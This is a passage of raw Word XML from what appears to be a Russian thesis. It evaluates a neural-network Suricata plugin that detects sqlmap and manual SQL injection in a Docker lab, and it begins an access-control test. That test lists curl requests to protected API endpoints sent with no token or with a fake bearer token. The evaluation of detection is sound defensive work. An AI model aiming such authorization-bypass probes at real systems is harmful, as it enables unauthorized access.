          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001D67DC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E16130F" w14:textId="6F7FB0CE" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>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Процесс обнаружения этих команд плагином показан на рисунке 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5F9FF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00573718" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B4736B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005D6C1B" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66DCDF7E" wp14:editId="4276CCD9">
            <wp:extent cx="5690235" cy="2294627"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="801013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13659" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5699695" cy="2298442"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BCAA29" w14:textId="1D5AC39B" w:rsidR="008E0171" w:rsidRPr="001D67DC" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение ручной </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>QL-инъекции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8BC03" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001D67DC" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B1A61E"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Pr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ходе ручного тестирования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алерты</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> фиксировались с IP-адреса 192.168.0.104 (целевой узел), а не с IP-адреса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux. Это обусловлено механизмом сетевой трансляции адресов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-контейнера — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> анализирует трафик на сетевом интерфейсе хост-машины и видит запросы как исходящие от самого сервера. Данное поведение характерно для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">подобных </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сред и не влияет на факт обнаружения аномальной активности</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E9D60" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="003E0BEE"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результате</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> нейросетевой плагин успешно обнаружил аномальную активность в обоих сценариях. Автоматизированная атака </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> генерирует большое количество HTTP-запросов с нетипичными параметрами за короткое время, что проявляется в аномальных значениях интенсивности трафика и асимметрии потока. Ручные инъекции также были зафиксированы благодаря нетипичному характеру запросов к базе данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264CEDF7" w14:textId="5980A0DB" w:rsidR="00305EE7" w:rsidRPr="00402025" w:rsidRDefault="008E0171" w:rsidP="006605C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">обнаружила SQL-инъекции на основе сигнатур из набора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>web_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В частности, сработали правила, идентифицирующие характерные строки в теле HTTP-запроса. Всего зафиксировано 89 срабатываний. Однако часть запросов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> были пропущены, так как сигнатуры не покрыли все вариации.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0BEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>237 срабатываний.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC04BEF" w14:textId="52A49FAE" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="004C410D" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.4.</w:t>
      </w:r>
      <w:r w:rsidR="000A1CD6" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 5. Нарушение контроля доступа </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CEA289" w14:textId="77777777" w:rsidR="004C410D" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данная уязвимость связана с отсутствием или некорректной реализацией механизмов разграничения прав доступа, что позволяет пользователям выполнять действия за пределами своих полномочий. Тестирование проводилось в трёх сценариях.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DFBF3" w14:textId="4C5DFBE5" w:rsidR="008E0171" w:rsidRDefault="004C410D"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3.4.</w:t>
      </w:r>
      <w:r w:rsidR="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сценарий 1 — Попытка обхода авторизации API плагина</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00C43929">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С атакующей машины выполнялись запросы к защищённым конечным точкам без токена и с поддельными токенами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E59B993" w14:textId="77777777" w:rsidR="004C410D" w:rsidRPr="00244ABF" w:rsidRDefault="004C410D" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422750E0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl http://192.168.0.104:5000/api/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795672AB" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl http://192.168.0.104:5000/api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A0D66" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl http://192.168.0.104:5000/api/audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5960BE85" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl -H "Authorization: Bearer fake_token_123" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79E48E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://192.168.0.104:5000/api/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32421F89" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="005A1278" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
